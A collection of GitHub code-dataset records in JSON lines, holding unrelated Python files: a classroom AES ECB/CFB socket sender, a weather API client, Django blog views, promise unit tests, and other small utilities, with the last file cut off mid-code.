quis, pulvinar tristique elit. Praesent facilisis ut nisi quis mattis. Ut quam nibh, lobortis quis ligula vel, rutrum pellentesque risus. In consequat, enim eget laoreet tempor, nibh tellus mollis tortor, nec laoreet ex neque ac mauris. Nullam laoreet at ex eu luctus. Integer tempor euismod ultricies. Vestibulum vitae sagittis massa. Sed ipsum libero, facilisis in mi sit amet, mollis lacinia enim. Aenean et aliquet massa.\"\"\"\n\ndef encrypt_and_return_key(key):\n enc = AES.new(b'sixteen byte key', AES.MODE_ECB, os.urandom(16))\n return enc.encrypt(key)\n\nif len(sys.argv) < 2:\n print('Usage: ./sender.py mode (mode in [\\'ecb\\', \\'cfb\\']).')\n exit(0)\n\nif sys.argv[1] not in ['ecb', 'cfb']:\n print('Incorrect encryption standard. Must be either \\'ecb\\' or \\'cfb\\'.')\n exit(0)\n\nkey = os.urandom(16)\naes = AES.new(key, AES.MODE_ECB, os.urandom(16))\n\nr = socket.socket()\nport = 8080\nr.connect(('127.0.0.1', port))\n\n# initial handshake\nr.send(sys.argv[1].encode())\nresponse = r.recv(2).decode()\nif response == 'no':\n print('Negative response received after communicating encryption mode. Exiting...')\n exit(0)\nr.send(encrypt_and_return_key(key))\n\nif sys.argv[1] == 'ecb':\n for i in range(0, len(text_to_send), 16):\n plaintext = text_to_send[i:min(len(text_to_send), i + 16)]\n while len(plaintext) < 16: plaintext += \" \"\n r.send(aes.encrypt(plaintext))\nelif sys.argv[1] == 'cfb':\n iv = b'sixteen byte iv '\n for i in range(0, len(text_to_send), 16):\n plaintext = text_to_send[i:min(len(text_to_send), i + 16)]\n while len(plaintext) < 16: plaintext += \" \"\n\n # encrypt the iv\n enc_iv = aes.encrypt(iv)\n\n # xor with the plaintext and send\n cyphertext = bytes([(a ^ b) for a, b in zip(plaintext.encode(), enc_iv)])\n r.send(cyphertext)\n\n # updating the iv\n iv = cyphertext\nelse:\n pass\n\nr.close()\n","repo_name":"theodor-vlad/SI-HW","sub_path":"tema1/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25414524640","text":"from math import pi\r\n\r\n# Location of the antenna and altitude above sea level\r\nLAT = 45.276055\r\nLON = 13.721878\r\nALTITUDE = 226\r\n\r\n# Steps in a rotation\r\nSTEPS_PER_ROT = 660000\r\n\r\n# Transmission ratio stepsperrev/200\r\nTRANSMISSION_RATIO = STEPS_PER_ROT / 200\r\n\r\n# Steps of the SM per 1 degree rotation on the output shaft\r\nSTEPS_PER_DEG = int(STEPS_PER_ROT / 360)\r\n\r\n# Inverse of the above, used to update the pointing after every step of a SM\r\nDEG_PER_STEP = 1/STEPS_PER_DEG\r\n\r\n# Used to convert angles from radians to degrees\r\nRAD_TO_DEG_FACTOR = 180 / pi\r\n\r\n# Time in seconds that the program sleeps for after every step of a SM (no sleep time causes the motor to skip steps)\r\nSLEEP_TIME = 0.001\r\n\r\n# Rotation rate of the earth in degrees/second\r\nDEG_PER_SECOND = 1/240\r\n\r\n# Frequency (in seconds) of updating the position in console\r\nPRINT_FREQ = 1\r\n\r\n# Absolute RA SM position when in home position\r\nHA_HOME_ABS_POSITION = int(STEPS_PER_ROT * (1/4))\r\n\r\n# Hour angle when in home position\r\nHOME_HA = 270 + 2.73\r\n\r\n# Absolute Dec SM position when in home position\r\nDEC_HOME_ABS_POSITION = STEPS_PER_ROT / 2\r\n\r\n# Declination when in home positon\r\nHOME_DEC = -45\r\n\r\n# Main menu output\r\nMENU_STRING = '===== eCALLISTO Master v1.0 =====\\nt = track sun\\nh = home\\ngoto = GoTo\\nm = manual control (RA and Dec)\\ncoords = print current coords\\n>>> '","repo_name":"jakovsch/callisto","sub_path":"rotator/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4251119290","text":"from pathlib import Path\nimport requests\nimport json\nimport sys\nimport time\nfrom time import gmtime, strftime\n\n'''TODO\n- Compare places\n- Weather for specific date\n'''\n\n\n'''Default values'''\nheaders = {'User-Agent':'jesperdahl@hotmail.no'}\nplace = 'Oslo'\ndebug = False\n\n#https://developer.yr.no/doc/StatusCodes/\n#https://developer.yr.no/doc/locationforecast/HowTO/\n#https://developer.yr.no/doc/GettingStarted/\n#https://developer.yr.no/doc/ForecastJSON/\n\n#https://nominatim.openstreetmap.org/search.php?q=oslo&format=jsonv2\n#https://api.met.no/weatherapi/locationforecast/2.0/compact?lat=59&lon=10\n\nargs = sys.argv\n\nif len(args) == 2:\n place = args[1]\nif len(args) == 3:\n place = args[1]\n debug = True if args[2] == '-d' else False\n\n\n'''Request and processing for lat/lon'''\ndef request_nomatim(place):\n try:\n base_url = f'https://nominatim.openstreetmap.org/search.php?q={place}&format=jsonv2'\n response = requests.get(base_url, headers={'User-Agent': 'jesperdahl@hotmail.no'})\n except:\n print(f\"An error occured, could not access {base_url}\")\n return response.json()\n\ndef parse_coord(response) -> list() :\n return [float(response[0]['lat']), float(response[0]['lon'])]\n\ndef current_time():\n return time.strftime('%a, %d %b %Y %H:%M:%S %Z', time.gmtime())\n\ndef write_meta_data(response):\n last_modified = response.headers['Last-Modified']\n expires = response.headers['Expires']\n\n metadata = {\n 'place':place,\n 'expires':expires,\n 'last_modified':last_modified\n }\n metadata_json = json.dumps(metadata, indent=4)\n with open('metadata.json', 'w') as out_meta:\n out_meta.write(metadata_json)\n\ndef write_weather_data(data):\n weather_json_data = json.dumps(data, indent=4)\n\n with open(\"weather_data.json\", 'w') as outfile:\n outfile.write(weather_json_data)\n\ndef direction(deg):\n dirs = ['N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW']\n ix = round(deg / (360. / len(dirs)))\n return dirs[ix % len(dirs)]\n\n\ndef handle_met_request(lat,lon):\n meta_exists = False\n is_modified = False\n last_modified = \"\"\n expires = \"\"\n\n if debug:\n print(\"Search coords:\", lat, lon)\n lat = float(lat)\n lon = float(lon)\n\n meta_file = Path('metadata.json')\n if meta_file.is_file():\n meta_exists = True\n\n if not meta_exists:\n if debug:\n print(\"No previous forecast found, creating new metadata and weatherdata\")\n\n\n met_response = met_request(lat,lon,is_modified, last_modified)\n\n if met_response.status_code != 200:\n print(\"Program exited with code\", met_response.status_code)\n exit()\n \n write_meta_data(met_response)\n write_weather_data(met_response.json())\n\n return met_response.json()\n\n with open('metadata.json', 'r') as meta_in:\n metadata = json.load(meta_in)\n expires = metadata['expires']\n last_modified = metadata['last_modified']\n meta_place = metadata['place']\n\n if debug:\n print(f\"Metadata found for place {meta_place}: \\n Prev. Data expires: {expires}\\n Last modified: {last_modified}\")\n \n \n\n if meta_place != place:\n met_response = met_request(lat,lon,is_modified,last_modified)\n write_meta_data(met_response)\n write_weather_data(met_response.json())\n return met_response.json()\n\n time = current_time()\n if time > expires:\n if debug:\n print(time)\n print(\"Weather data expired, requesting...\")\n\n\n is_modified = True\n met_response = met_request(lat,lon,is_modified,last_modified)\n \n if met_response.status_code == 304:\n if debug:\n print(\"Data not modified, using stored data\")\n \n\n with open('weather_data.json', 'r') as weather_in:\n weather_data = json.load(weather_in)\n return weather_data\n \n write_meta_data(met_response)\n write_weather_data(met_response.json())\n return met_response.json()\n\n if debug:\n print(\"Weather data not expired, using stored data\")\n\n with open('weather_data.json', 'r') as weather_in:\n weather_data = json.load(weather_in)\n return weather_data\n\n\ndef show_forecast(response):\n updated_at = response['properties']['meta']['updated_at']\n temp_unit = response['properties']['meta']['units']['air_temperature']\n\n time = response['properties']['timeseries'][0]['time']\n air_temp = response['properties']['timeseries'][0]['data']['instant']['details']['air_temperature']\n wind_direction = response['properties']['timeseries'][0]['data']['instant']['details']['wind_from_direction']\n wind_speed = response['properties']['timeseries'][0]['data']['instant']['details']['wind_speed']\n \n next_1_hour = {\n #'rain': response['properties']['timeseries'][0]['data']['next_1_hour']['details']['precipitation_amount']\n }\n\n \n print(f\"\\n~~~~~~~~ Weather for {place} at {time} ~~~~~~~~\")\n print(f\"| Updated at {updated_at}\\n|\")\n print(f\"| - {air_temp} degrees {temp_unit}\\n| - Wind speed {wind_speed} m/s\")\n print(f\"| - Wind direction {direction(wind_direction)}\")\n\n\n\n''' @lat latitude float\n @lon longitude float\n @is_modified boolean if modified since last request\n @modified timestamp \n'''\ndef met_request(lat, lon, is_modified, modified):\n try:\n base_url = f'https://api.met.no/weatherapi/locationforecast/2.0/compact?lat={lat:.2f}&lon={lon:.2f}'\n if is_modified:\n response = requests.get(base_url, headers={'User-Agent': 'jesperdn@hotmail.no', 'If-Modified-Since':modified})\n else:\n response = requests.get(base_url, headers={'User-Agent': 'jesperdn@hotmail.no'})\n except:\n print(f\"An error occured, could not access {base_url}\")\n return response\n\n\ndef main():\n nomatim_response = request_nomatim(place)\n coords = parse_coord(nomatim_response)\n met_response = handle_met_request(coords[0], coords[1])\n show_forecast(met_response)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jesperdn/Forecast","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73100155752","text":"import time\nimport numpy as np\nfrom numpy_ringbuffer import RingBuffer\nfrom asi import ASICamera\n\n\ndef frame_rate_test(camera, n=100):\n start_time = time.monotonic()\n camera.start_video_capture()\n #image_array = RingBuffer(capacity=10, dtype=(np.uint16, 3672, 5496))\n image_array = []\n for i in range(n):\n image = camera.get_video_data()\n #Start Brint's code\n if image is not None:\n #do stuff\n image_array.append(image)\n diff = image_array[0] - image\n \n \n end_time = time.monotonic()\n camera.stop_video_capture()\n fps = n / (end_time - start_time)\n msg = \"Got {} frames in {} seconds ({} fps).\".format(n, (end_time - start_time), fps)\n print(msg)\n return fps\n\n\nif __name__ == '__main__':\n camera = ASICamera(library_path='/usr/local/lib/libASICamera2.so')\n frame_rate_test(camera, n=1000)\n","repo_name":"AnthonyHorton/fast-zwo","sub_path":"video_test.py","file_name":"video_test.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42094474977","text":"def nok(a,b):\r\n m = a*b #Ищем нод по формуле Евклида\r\n while a != 0 and b != 0:\r\n if a > b:\r\n a %= b\r\n else:\r\n b %= a\r\n nod = a + b\r\n nok = m//nod\r\n return nok # можно было бы прописать print(nok) и в 16 строчке написать nok(a,b) работало б также\r\n\r\nwhile True:\r\n try:\r\n a = abs(int(input(\"Введите первое число\"))) # Берем мдуль что бы мы могли считать НОК с отрицательных чисел.\r\n b = abs(int(input(\"Введите второе число\")))\r\n print(nok(a,b))\r\n except ValueError:\r\n print('Вводить нужно цифры')\r\n continue\r\n","repo_name":"Pasha-lt/ITEA","sub_path":"lesson03/hw_3_2.py","file_name":"hw_3_2.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28817635748","text":"from flask import (\n Flask,\n jsonify,\n request\n)\n\nfrom pymongo import MongoClient\nimport subprocess\nimport json\nimport requests\n\napp = Flask(__name__)\nclient = MongoClient('localhost', 27017)\ndb = client['imageclassification']\nImage = db['Images']\n\n@app.route('/')\ndef index():\n return 'ok'\n\n@app.route('/register', methods=['POST'])\ndef register():\n data = request.get_json()\n\n res = Image.insert_one({\n 'username': data['username'],\n 'password': data['password'],\n 'toke_amount': 5\n })\n\n return jsonify({\n 'success': True,\n })\n\n@app.route('/classify')\ndef classify():\n data = request.get_json()\n url = data['url']\n\n r = requests.get(url)\n ret = {}\n with open(\"temp.jpg\", \"wb\") as f:\n f.write(r.content)\n proc = subprocess.Popen('python classify_image.py --image_file=temp.jpg', shell=True)\n proc.communicate()[0]\n proc.wait()\n with open('text.txt') as g:\n ret = json.load(g)\n \n return jsonify(ret)\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"timmyyeh/Flask-Apis","sub_path":"image_classification/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2344234689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 8 15:57:18 2022\n\n@author: tdewacher\n\"\"\"\n\nimport numpy as np\nfrom scipy.ndimage import rotate\nimport os\nfrom astropy.io import fits\nfrom matplotlib.colors import PowerNorm\nimport matplotlib.pyplot as plt\n\ndef crop(img,amount):\n '''\n Crops the given image by a given amount of pixels in every direction\n\n Parameters\n ----------\n img : 2D array\n amount : int\n\n Returns\n -------\n cropped : 2D array\n\n '''\n dx,dy = np.shape(img)\n cropped = img[amount:dx-amount,amount:dy-amount]\n return cropped\n\ndef align_rotation(ald,bet):\n '''\n Rotates the picture of Aldebaran in order to align it with Betelgeuse and saves it to a fits\n\n Parameters\n ----------\n ald : str\n Path to the PSF of Aldebaran.\n bet : str\n Path to the corresponding Betelgeuse image.\n\n '''\n \n # Getting images and hdrs\n with fits.open(ald) as hdul:\n img_ald = hdul[0].data\n hdr_ald = hdul[0].header\n with fits.open(bet) as hdul:\n img_bet = hdul[0].data\n hdr_bet = hdul[0].header\n \n # Getting the angle\n alpha = -(hdr_bet[\"HIERARCH ESO TEL PARANG START\"] - hdr_ald[\"HIERARCH ESO TEL PARANG START\"])\n rotated = rotate(img_ald,alpha,reshape=False)\n \n # Crop image\n i = 1\n while len(rotated[rotated == 0]) != 0:\n rotated = crop(rotated,i)\n \n # Saving the rotated image\n hdul = fits.PrimaryHDU(rotated,hdr_ald)\n hdul.writeto(ald.replace(\"true\",\"rot\"),overwrite=True,output_verify=\"silentfix\")\n return\n","repo_name":"TimEpsilon/Lucky-imaging","sub_path":"RotateImage.py","file_name":"RotateImage.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10623185730","text":"import os\nimport sys\nimport ujson\nimport binascii\nimport zipfile\nimport base64\nfrom io import BytesIO\nfrom lib import OPNsenseConfig\n\nresponse = dict()\nsource_directory = '/usr/local/opnsense/scripts/OPNsense/CaptivePortal/htdocs_default'\n\noutput_data = BytesIO()\n\nwith zipfile.ZipFile(output_data, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:\n # overlay user template data\n user_filenames = list()\n if len(sys.argv) > 1:\n # Search for user template, using fileid\n # In this case, we must use the config.xml to retrieve the latest content.\n # When using the generated config, the user experience will be a bit odd (old content after upload)\n cnf = OPNsenseConfig()\n template_content = cnf.get_template(sys.argv[1])\n if template_content is not None:\n try:\n input_data = BytesIO(base64.b64decode(template_content))\n with zipfile.ZipFile(input_data, mode='r', compression=zipfile.ZIP_DEFLATED) as zf_in:\n for zf_info in zf_in.infolist():\n user_filenames.append(zf_info.filename)\n zf.writestr(zf_info.filename, zf_in.read(zf_info.filename))\n except zipfile.BadZipfile:\n # not in zip format\n response['error'] = 'internal xml data not in zip format, user data discarded'\n except binascii.Error:\n # not base64 encoded\n response['error'] = 'internal xml data not in base64 format, user data discarded'\n\n # read standard template from disk\n for root, dirs, files in os.walk(source_directory):\n for filename in files:\n filename = '%s/%s' % (root, filename)\n output_filename = filename[len(source_directory)+1:]\n if output_filename not in user_filenames:\n tmp = open(filename, 'rb').read()\n zf.writestr(output_filename, tmp)\n\nresponse['payload'] = base64.b64encode(output_data.getvalue()).decode()\nresponse['size'] = len(response['payload'])\nprint(ujson.dumps(response))\n","repo_name":"opnsense/core","sub_path":"src/opnsense/scripts/OPNsense/CaptivePortal/fetch_template.py","file_name":"fetch_template.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":2702,"dataset":"github-code","pt":"72"} +{"seq_id":"1552417135","text":"from unittest.mock import Mock\n\nimport pytest\n\nfrom redun.promise import Promise, wait_promises\n\n\ndef test_resolve() -> None:\n \"\"\"\n Promise constructor should resolve values.\n \"\"\"\n promise: Promise[int] = Promise(lambda resolve, reject: resolve(10))\n assert promise.value == 10\n\n\ndef test_reject() -> None:\n \"\"\"\n Promise constructor should reject exceptions.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise(lambda resolve, reject: reject(error))\n assert promise.error == error\n\n\ndef test_do_resolve() -> None:\n \"\"\"\n Promises should resolve values after instantiation.\n \"\"\"\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n assert promise.value == 10\n\n\ndef test_do_reject() -> None:\n \"\"\"\n Promises should reject exceptions after instantiation.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise()\n promise.do_reject(error)\n assert promise.error == error\n\n\ndef test_resolve_first() -> None:\n \"\"\"\n First resolution counts.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n promise.do_resolve(20)\n promise.do_reject(error)\n assert promise.value == 10\n\n\ndef test_resolved_has_no_error() -> None:\n \"\"\"\n Once resolved, promise is marked as not rejected.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n promise.do_reject(error)\n assert promise.value == 10\n with pytest.raises(ValueError):\n promise.error\n\n\ndef test_reject_first() -> None:\n \"\"\"\n First rejection counts.\n \"\"\"\n error = ValueError(\"boom\")\n error2 = ValueError(\"boom2\")\n promise: Promise[int] = Promise()\n promise.do_reject(error)\n promise.do_reject(error2)\n promise.do_resolve(10)\n promise.do_resolve(20)\n assert promise.error == error\n\n\ndef test_then_resolve() -> None:\n \"\"\"\n Promise resolutions should propagate through then().\n \"\"\"\n mock = Mock()\n promise: Promise[int] = Promise()\n promise.then(mock)\n promise.do_resolve(10)\n mock.assert_called_with(10)\n\n\ndef test_then_reject() -> None:\n \"\"\"\n Promise rejections should propagate through then().\n \"\"\"\n\n def fail(error):\n pass\n\n mock = Mock(fail)\n promise: Promise[int] = Promise()\n promise.then(None, mock)\n\n error = ValueError(\"boom\")\n promise.do_reject(error)\n mock.assert_called_with(error)\n\n\ndef test_resolve_then() -> None:\n \"\"\"\n Already resolved promises should still propagate through then().\n \"\"\"\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n\n mock = Mock()\n promise.then(mock)\n mock.assert_called_with(10)\n\n\ndef test_reject_then() -> None:\n \"\"\"\n Already rejected promises should still propagate through then().\n \"\"\"\n promise: Promise[int] = Promise()\n error = ValueError(\"boom\")\n promise.do_reject(error)\n\n mock = Mock()\n promise.then(None, mock)\n mock.assert_called_with(error)\n\n\ndef test_resolve_multiple_then() -> None:\n \"\"\"\n Resolutions should fan-out to multiple `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(mock)\n mock2 = Mock()\n promise.then(mock2)\n\n promise.do_resolve(10)\n mock.assert_called_with(10)\n mock2.assert_called_with(10)\n\n\ndef test_reject_multiple_then() -> None:\n \"\"\"\n Rejections should fan-out through multiple `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(None, mock)\n mock2 = Mock()\n promise.then(None, mock2)\n\n error = ValueError(\"boom\")\n promise.do_reject(error)\n mock.assert_called_with(error)\n mock2.assert_called_with(error)\n\n\ndef test_chain_resolve() -> None:\n \"\"\"\n Resolutions should propagate through chained `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(lambda x: x + 1).then(lambda x: x + 2).then(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(13)\n\n\ndef test_chain_reject() -> None:\n \"\"\"\n Rejections should propagate through chained `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(lambda x: x + 1).then(None, mock)\n\n error = ValueError(\"boom\")\n promise.do_reject(error)\n mock.assert_called_with(error)\n\n\ndef test_chain_null() -> None:\n \"\"\"\n Resolutions should propagate through empty `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then().then(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(10)\n\n\ndef test_nest_resolve() -> None:\n \"\"\"\n Resolutions of nested promises should propagate.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(lambda x: Promise(lambda resolve, reject: resolve(x + 1))).then(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(11)\n\n\ndef test_nest_reject() -> None:\n \"\"\"\n Rejections of nested promises should propagate.\n \"\"\"\n promise: Promise[int] = Promise()\n\n error = ValueError(\"boom\")\n mock = Mock()\n promise.then(lambda x: Promise(lambda resolve, reject: reject(error))).catch(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(error)\n\n\ndef test_raise() -> None:\n \"\"\"\n Raising an exception should reject the Promise.\n \"\"\"\n error = ValueError(\"boom\")\n\n def then(result: int) -> None:\n raise error\n\n def fail(error: Exception) -> int:\n return 100\n\n def final(result: int) -> None:\n pass\n\n promise: Promise[int] = Promise()\n\n mock = Mock(side_effect=fail)\n mock2 = Mock(side_effect=final)\n promise.then(then).catch(mock).then(mock2)\n\n promise.do_resolve(10)\n mock.assert_called_with(error)\n mock2.assert_called_with(100)\n\n\ndef test_all() -> None:\n \"\"\"\n Promise.all() should resolve when all child promises resolve.\n \"\"\"\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(mock)\n\n promise1.do_resolve(1)\n promise2.do_resolve(2)\n mock.assert_called_with([1, 2])\n\n\ndef test_all_first() -> None:\n \"\"\"\n Promise.all() should resolve even when all child promises resolve first.\n \"\"\"\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n promise1.do_resolve(1)\n promise2.do_resolve(2)\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(mock)\n\n mock.assert_called_with([1, 2])\n\n\ndef test_all_reject() -> None:\n \"\"\"\n Promise.all() should reject when any child promise rejects.\n \"\"\"\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(None, mock)\n\n error = ValueError(\"boom\")\n promise1.do_resolve(1)\n promise2.do_reject(error)\n mock.assert_called_with(error)\n\n\ndef test_all_reject_first() -> None:\n \"\"\"\n Promise.all() should reject even when a child promise rejects first.\n \"\"\"\n error = ValueError(\"boom\")\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n promise1.do_resolve(1)\n promise2.do_reject(error)\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(None, mock)\n\n mock.assert_called_with(error)\n\n\ndef test_wait_promises() -> None:\n \"\"\"\n wait_promises() should wait for all subpromises regardless of success or failure.\n \"\"\"\n\n def good():\n return Promise(lambda resolve, reject: resolve(10))\n\n def bad():\n return Promise(lambda resolve, reject: reject(ValueError(\"boom\")))\n\n top = wait_promises([good(), good(), good()])\n promises = top.value\n assert [promise.value for promise in promises] == [10, 10, 10]\n\n top = wait_promises([good(), bad(), good()])\n promises = top.value\n assert promises[0].value == 10\n assert isinstance(promises[1].error, ValueError)\n assert promises[2].value == 10\n\n a: Promise[int] = Promise()\n top = wait_promises([good(), bad(), a])\n a.do_resolve(20)\n promises = top.value\n assert promises[0].value == 10\n assert isinstance(promises[1].error, ValueError)\n assert promises[2].value == 20\n","repo_name":"insitro/redun","sub_path":"redun/tests/test_promise.py","file_name":"test_promise.py","file_ext":"py","file_size_in_byte":8310,"program_lang":"python","lang":"en","doc_type":"code","stars":466,"dataset":"github-code","pt":"72"} +{"seq_id":"12585600087","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='product',\n name='id',\n ),\n migrations.AlterField(\n model_name='product',\n name='product_id',\n field=models.CharField(primary_key=True, max_length=30, serialize=False),\n ),\n ]\n","repo_name":"thaiduongpham/django-shoppingcart","sub_path":"home/migrations/0002_auto_20150729_0108.py","file_name":"0002_auto_20150729_0108.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32487078198","text":"\nfrom django.urls import reverse\nfrom django.http import response\nfrom django.core import serializers\nfrom django.http.response import HttpResponse\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import redirect, render\nfrom django.db import IntegrityError\nfrom django.contrib.auth import logout, authenticate, login\n\n\nfrom Blog.models import Subject, Topic, Content\nfrom django.contrib.auth.models import User\n# Create your views here.\n\n\ndef paginator_assist(paginator, single_page, max_num_of_link):\n import math\n link_number = []\n if paginator.num_pages <= max_num_of_link:\n link_number = [i for i in range(1, paginator.num_pages+1)]\n else:\n if single_page.number > math.floor(max_num_of_link/2):\n for i in range(single_page.number-math.floor(max_num_of_link/2), single_page.number+math.ceil(max_num_of_link/2)):\n if i <= paginator.num_pages:\n link_number.append(i)\n\n else:\n link_number = [i for i in range(1, max_num_of_link)]\n return link_number\n\n\ndef index(request):\n if request.method == 'GET':\n\n post = Content.objects.order_by('published_date')\n\n return render(request, 'home.html', {'num_of_user': User.objects.count(), 'num_of_post': Content.objects.count(), 'subjects': Subject.objects.all(), 'posts': post.reverse()[:5]})\n\n if request.method == 'POST':\n print(\"POST request\")\n content = request.POST['editor']\n return HttpResponse(f\"

      {content}

      \")\n\n\ndef add_subject(request):\n if request.method == 'POST':\n context = {}\n subject_name = request.POST['subject']\n\n try:\n Subject.objects.create(subject=subject_name.lower())\n request.session[\"add_sub_noti\"] = \"{subject_name} added successfully\"\n except IntegrityError:\n print(f\"Subject {subject_name} already exist\")\n request.session[\"duplicate_data_error\"] = f\"{subject_name} already Exist\"\n return redirect(reverse('subject-list'))\n\n if request.method == 'GET':\n return redirect(reverse('subject-list'))\n\n\ndef Subject_List_View(request):\n num_of_page = 5\n max_num_of_link = 5\n link_number = []\n subject_list = Subject.objects.all()\n paginator = Paginator(subject_list, num_of_page)\n page_number = request.GET.get('page')\n single_page = paginator.get_page(page_number)\n i = (single_page.number-1)*num_of_page\n\n print(link_number)\n context = {\n 'single_page': single_page,\n 'i': i,\n 'link_number': paginator_assist(paginator, single_page, max_num_of_link)\n }\n return render(request, 'categories.html', context)\n\n\ndef topic_list_by_subject_view(request, *args, **kwargs):\n if request.method == \"GET\":\n subject_name = request.GET['subject'].lower()\n\n topiclist = Topic.objects.filter(\n subject__subject__contains=subject_name)\n print(topiclist)\n topiclist = serializers.serialize('json', topiclist)\n return HttpResponse(topiclist)\n\n\ndef add_topic_view(request):\n if request.method == 'POST':\n\n subject = request.POST.get('subject', False)\n new_topic = request.POST.get('topic', False)\n try:\n new_subject = Subject.objects.get(pk=subject)\n except:\n return HttpResponse(\"subject doesn't exist\")\n Topic.objects.create(subject=new_subject, title=new_topic)\n\n return HttpResponse(\"successfully saved\")\n return HttpResponse('only post request acceptable')\n\n\ndef add_post_view(request):\n print(request.POST)\n title = request.POST['title']\n subject = request.POST['subject']\n topic = request.POST['topic']\n content = request.POST['editor']\n\n try:\n topic = Topic.objects.get(pk=topic)\n subject = Subject.objects.get(pk=subject)\n except:\n return redirect('/admin',)\n\n Content.objects.create(topic=topic, subject=subject,\n sub_title=title, content=content)\n return redirect('/admin')\n\n\ndef user_list_view(request):\n return render(request, 'users.html', {})\n\n\ndef login(request):\n pass\n\n\ndef Logout(request):\n logout(request)\n return redirect('/', permanent=True)\n \n","repo_name":"RashedEmon/E-Learning","sub_path":"adminpanel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1435106060","text":"t = int(input())\ndef solve():\n n = int(input())\n mine = sorted(map(int, input().split()))\n ilya = sorted(map(int, input().split()))\n preM, preI = [0], [0]\n for x in range(n):\n preM.append(mine[~x] + preM[x])\n preI.append(ilya[x] + preI[x])\n preM = list(reversed(preM))\n preM.pop(-1)\n\n def check(r):\n leng = n+r\n top = leng - leng//4\n my_lap = max(0, top-r)\n my_score = 100*r + (preM[-my_lap] if my_lap > 0 else 0)\n il_score = preI[-1] - preI[max(0, n-top)]\n return my_score >= il_score\n\n lo, hi = 0, 3*n\n while lo < hi:\n mid = (lo+hi) // 2\n if check(mid): hi = mid\n else: lo = mid + 1\n return lo\n\nfor _ in range(t):\n print(solve())\n","repo_name":"henryliuser/hliu-cp","sub_path":"codeforces/L0/733c.py","file_name":"733c.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"25345692912","text":"import json\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom asgiref.sync import sync_to_async\n# from channels.db import database_sync_to_async\nfrom .models import Message, Room, Information, RoomHistory\nfrom django.contrib.auth.models import User\n\n\nclass UserConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.user_id = self.scope['url_route']['kwargs']['user_id']\n self.user_group_id = f'user'\n self.user = self.scope['user']\n await self.channel_layer.group_add(\n self.user_group_id,\n self.channel_name\n )\n if self.scope['user'].is_authenticated:\n await self.accept()\n else:\n await self.close(code=4001)\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(\n self.user_group_id,\n self.channel_name\n )\n try:\n infors = await self.set_status(False,self.user_id)\n for info in infors:\n await self.channel_layer.group_send(\n f'user',\n {\n 